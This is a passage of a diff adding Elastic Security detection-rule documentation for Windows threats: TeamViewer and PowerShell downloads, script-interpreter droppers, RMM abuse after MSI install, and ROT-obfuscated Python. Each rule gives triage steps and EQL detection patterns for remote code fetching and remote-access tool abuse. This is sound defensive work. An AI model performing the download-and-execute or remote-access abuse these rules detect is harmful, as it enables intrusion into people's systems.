Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Review the privileges needed to write to the network share and restrict write access as needed. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=1m + [file where host.os.type == "windows" and event.type in ("creation", "change") and + process.pid == 4 and (file.extension : ("exe", "scr", "pif", "com") or file.Ext.header_bytes : "4d5a*")] by host.id, file.path + [process where host.os.type == "windows" and event.type == "start" and + not ( + ( + process.code_signature.trusted == true and + process.code_signature.subject_name : ( + "Veeam Software Group GmbH", + "Elasticsearch, Inc.", + "PDQ.com Corporation", + "CrowdStrike, Inc.", + "Microsoft Windows Hardware Compatibility Publisher", + "ZOHO Corporation Private Limited", + "BeyondTrust Corporation", + "CyberArk Software Ltd.", + "Sophos Ltd" + ) + ) or + ( + process.executable : ( + "?:\\Windows\\ccmsetup\\ccmsetup.exe", + "?:\\Windows\\SoftwareDistribution\\Download\\Install\\AM_Delta*.exe", + "?:\\Windows\\CAInvokerService.exe" + ) and process.code_signature.trusted == true + ) or + ( + process.executable : "G:\\SMS_*\\srvboot.exe" and + process.code_signature.trusted == true and process.code_signature.subject_name : "Microsoft Corporation" + ) + ) + ] by host.id, process.executable + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SMB/Windows Admin Shares +** ID: T1021.002 +** Reference URL: https://attack.mitre.org/techniques/T1021/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc new file mode 100644 index 0000000000..e9b2e8712c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer.asciidoc @@ -0,0 +1,143 @@ +[[prebuilt-rule-8-19-18-remote-file-copy-via-teamviewer]] +=== Remote File Copy via TeamViewer + +Identifies an executable or script file remotely downloaded via a TeamViewer transfer session. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.file-* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: SentinelOne + +*Version*: 217 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote File Copy via TeamViewer* + + +Attackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files. + +TeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Contact the user to gather information about who and why was conducting the remote access. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and process.name : "TeamViewer.exe" and + file.extension : ("exe", "dll", "scr", "com", "bat", "cmd", "ps1", "vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta") and + not + ( + file.path : ( + "?:\\Users\\*\\AppData\\Local\\Microsoft\\Windows\\INetCache\\*.js", + "?:\\Users\\*\\AppData\\Local\\Temp\\TeamViewer\\update.exe", + "?:\\Users\\*\\AppData\\Local\\Temp\\?\\TeamViewer\\update.exe", + "?:\\Users\\*\\AppData\\Local\\TeamViewer\\CustomConfigs\\???????\\TeamViewer_Resource_??.dll", + "?:\\Users\\*\\AppData\\Local\\TeamViewer\\CustomConfigs\\???????\\TeamViewer*.exe" + ) and process.code_signature.trusted == true + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc new file mode 100644 index 0000000000..7c79c0104b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-powershell.asciidoc @@ -0,0 +1,166 @@ +[[prebuilt-rule-8-19-18-remote-file-download-via-powershell]] +=== Remote File Download via PowerShell + +Identifies powershell.exe being used to download an executable file from an untrusted remote destination. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.network-* +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 115 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote File Download via PowerShell* + + +Attackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse signed utilities to drop these files. + +PowerShell is one of system administrators' main tools for automation, report routines, and other tasks. This makes it available for use in various environments and creates an attractive way for attackers to execute code and perform actions. This rule correlates network and file events to detect downloads of executable and script files performed using PowerShell. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/interactive-investigation-guides.html[Investigate Markdown Plugin] introduced in Elastic Stack version 8.8.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Evaluate whether the user needs to use PowerShell to complete tasks. +- Investigate other alerts associated with the user/host during the past 48 hours. + - !{investigate{"label":"Alerts associated with the user in the last 48h","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"user.id","queryType":"phrase","value":"{{user.id}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}} + - !{investigate{"label":"Alerts associated with the host in the last 48h","providers":[[{"excluded":false,"field":"event.kind","queryType":"phrase","value":"signal","valueType":"string"},{"excluded":false,"field":"host.name","queryType":"phrase","value":"{{host.name}}","valueType":"string"}]],"relativeFrom":"now-48h/h","relativeTo":"now"}} +- Check the reputation of the domain or IP address used to host the downloaded file. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the file using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - !{investigate{"label":"Investigate the Subject Process Network Events","providers":[[{"excluded":false,"field":"process.entity_id","queryType":"phrase","value":"{{process.entity_id}}","valueType":"string"},{"excluded":false,"field":"event.category","queryType":"phrase","value":"network","valueType":"string"}]]}} + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- Administrators can use PowerShell legitimately to download executable and script files. Analysts can dismiss the alert if the Administrator is aware of the activity and the triage has not identified suspicious or malicious files. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=30s +[network where host.os.type == "windows" and + process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and + network.protocol == "dns" and + not dns.question.name : ( + "*.microsoft.com", "*.azureedge.net", "*.powershellgallery.com", "*.windowsupdate.com", + "metadata.google.internal", "dist.nuget.org", "artifacts.elastic.co", "*.digicert.com", + "*.chocolatey.org", "outlook.office365.com", "cdn.oneget.org", "ci.dot.net", + "packages.icinga.com", "login.microsoftonline.com", "*.gov", "*.azure.com", "*.python.org", + "dl.google.com", "sensor.cloud.tenable.com", "*.azurefd.net", "*.office.net", "*.anac*", + "aka.ms", "dot.net", "*.visualstudio.com", "*.local") and + not user.id == "S-1-5-18" and + /* Filter out NetBIOS/LLMNR-style names (e.g. host, localhost, etc.) */ + dns.question.name regex """.*\.[a-zA-Z]{2,5}"""] +[file where host.os.type == "windows" and event.type == "creation" and + process.name : "powershell.exe" and + (file.extension : ("exe", "dll", "ps1", "bat", "cmd", "vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta", "cpl", "scr", "pif", "com") or file.Ext.header_bytes : "4d5a*") and + not file.name : "__PSScriptPolicy*.ps1" and + not file.path : ( + "?:\\Users\\*\\AppData\\Local\\Temp\\????????.dll", + "?:\\Users\\*\\AppData\\Local\\Temp\\*\\????????.dll", + "?:\\Windows\\TEMP\\ansible-tmp-*\\AnsiballZ*.ps1" + ) and + not user.id == "S-1-5-18"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc new file mode 100644 index 0000000000..25c379a1bb --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-19-18-remote-file-download-via-script-interpreter]] +=== Remote File Download via Script Interpreter + +Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.network-* +* logs-endpoint.events.file-* +* logs-windows.sysmon_operational-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon + +*Version*: 214 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote File Download via Script Interpreter* + + +The Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation. + +Attackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals. + +This rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze both the script and the executable involved using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.entity_id + [network where host.os.type == "windows" and process.name : ("wscript.exe", "cscript.exe") and network.protocol != "dns" and + network.direction : ("outgoing", "egress") and network.type == "ipv4" and destination.ip != "127.0.0.1" + ] + [file where host.os.type == "windows" and event.type == "creation" and + file.extension : ("exe", "dll", "bat", "cmd", "ps1", "vbs", "vbe", "js", "jse", "wsh", "wsf", "sct", "hta", "scr", "pif", "com", "cpl")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Visual Basic +** ID: T1059.005 +** Reference URL: https://attack.mitre.org/techniques/T1059/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc new file mode 100644 index 0000000000..a761ddacc4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install.asciidoc @@ -0,0 +1,123 @@ +[[prebuilt-rule-8-19-18-remote-management-access-launch-after-msi-install]] +=== Remote Management Access Launch After MSI Install + +Detects an MSI installer execution followed by the execution of commonly abused Remote Management Software like ScreenConnect. This behavior may indicate abuse where an attacker triggers an MSI install then connects via a guest link with a known session key. + +*Rule type*: eql + +*Rule indices*: + +* endgame-* +* logs-crowdstrike.fdr* +* logs-endpoint.events.process-* +* logs-m365_defender.event-* +* logs-sentinel_one_cloud_funnel.* +* logs-system.security* +* logs-windows.sysmon_operational-* +* winlogbeat-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1219/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Command and Control +* Resources: Investigation Guide +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender for Endpoint +* Data Source: Crowdstrike +* Data Source: Windows Security Event Logs +* Data Source: Elastic Endgame + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote Management Access Launch After MSI Install* + + +This rule fires when the same host runs msiexec with an install argument (/i) and within one minute starts a pre-configured RMM software. + + +*Possible investigation steps* + + +- Confirm the sequence on the host: first event should be msiexec.exe with process.args containing "/i"; second should be a remote management software. +- Review the source of the MSI file using file events. +- Check whether use of RMM software is approved for this host. +- Check network events to validate which remote host the RMM software connects to. +- Correlate with other alerts for the same host (initial access, persistence, C2). + + +*False positive analysis* + + +- Legitimate IT/MSP deployment of RMM for support. + + +*Response and remediation* + + +- If unauthorized RMM use or abuse is confirmed: isolate the host, terminate the ScreenConnect client, remove or block the installation, and investigate how the MSI was delivered and who operates the relay. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=1m + [process where host.os.type == "windows" and event.type == "start" and process.name : "msiexec.exe" and process.args : ("/i*", "-i*")] + [process where host.os.type == "windows" and event.type == "start" and + ( + (process.name : "ScreenConnect.ClientService.exe" and process.command_line : "*?e=Access&y=Guest&h*&k=*") or + (process.name : "Syncro.Installer.exe" and process.args : "--config-json" and process.args : "--key") or + process.name : ("tvnserver.exe", "winvnc.exe") + ) + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Remote Access Tools +** ID: T1219 +** Reference URL: https://attack.mitre.org/techniques/T1219/ +* Sub-technique: +** Name: Remote Desktop Software +** ID: T1219.002 +** Reference URL: https://attack.mitre.org/techniques/T1219/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc new file mode 100644 index 0000000000..2677e1ee2a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-rot-encoded-python-script-execution.asciidoc @@ -0,0 +1,128 @@ +[[prebuilt-rule-8-19-18-rot-encoded-python-script-execution]] +=== ROT Encoded Python Script Execution + +Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/dprk-code-of-conduct +* https://www.reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* OS: macOS +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating ROT Encoded Python Script Execution* + + +ROT encoding, a simple letter substitution cipher, is often used to obfuscate Python scripts, making them harder to analyze. Adversaries exploit this by embedding ROT-encoded scripts within legitimate packages to evade detection. The detection rule identifies such activities by monitoring Python script executions and the presence of ROT-encoded compiled files, flagging potential misuse on Windows and macOS systems. + + +*Possible investigation steps* + + +- Review the process entity ID to identify the specific Python process that triggered the alert and gather details such as the process start time and command line arguments. +- Examine the file path and name of the ROT-encoded compiled file (e.g., "rot_??.cpython-*.pyc") to determine its origin and whether it is part of a legitimate package or potentially malicious. +- Check the parent process of the Python script to understand how it was initiated and whether it was executed by a legitimate application or user. +- Investigate the user account associated with the process to determine if the activity aligns with their typical behavior or if it appears suspicious. +- Analyze any network connections or file modifications made by the Python process to identify potential data exfiltration or further malicious activity. +- Correlate this alert with other security events or logs from the same host to identify patterns or additional indicators of compromise. + + +*False positive analysis* + + +- Legitimate development activities may trigger the rule if developers use ROT encoding for testing or educational purposes. To manage this, create exceptions for known development environments or specific user accounts involved in such activities. +- Automated scripts or tools that use ROT encoding for legitimate data processing tasks can be flagged. Identify these scripts and whitelist their execution paths or associated process names to prevent false alerts. +- Some security tools or software may use ROT encoding as part of their normal operations. Review and document these tools, then configure the detection system to exclude their known file paths or process identifiers. +- Regularly scheduled tasks or cron jobs that involve ROT-encoded files for non-malicious purposes can cause false positives. Exclude these tasks by specifying their unique identifiers or execution schedules in the detection rule settings. + + +*Response and remediation* + + +- Isolate the affected system from the network to prevent further spread of potentially malicious activity. +- Terminate any running Python processes that are identified as executing ROT-encoded scripts to halt the execution of obfuscated code. +- Conduct a thorough review of the affected system to identify and remove any ROT-encoded Python files, specifically targeting files matching the pattern "rot_??.cpython-*.pyc*". +- Restore any affected systems from a known good backup to ensure the removal of any persistent threats. +- Implement application whitelisting to prevent unauthorized Python scripts from executing, focusing on blocking scripts with ROT encoding patterns. +- Escalate the incident to the security operations team for further analysis and to determine if additional systems are affected. +- Update detection mechanisms to monitor for similar ROT-encoded script activities, enhancing the ability to detect and respond to future threats. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=1m + [process where host.os.type in ("windows", "macos") and event.type == "start" and process.name : "python*" and + not ( + process.args : ("*gcloud.py", "*conda-script.py", "*compileall.py", "*.lmstudio*") or + process.parent.args : ("*gcloud.py", "*conda-script.py", "*compileall.py", "*.lmstudio*") + )] + [file where host.os.type in ("windows", "macos") and + event.action != "deletion" and process.name : "python*" and file.name : "rot_??.cpython-*.pyc*"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Deobfuscate/Decode Files or Information +** ID: T1140 +** Reference URL: https://attack.mitre.org/techniques/T1140/ +* Technique: +** 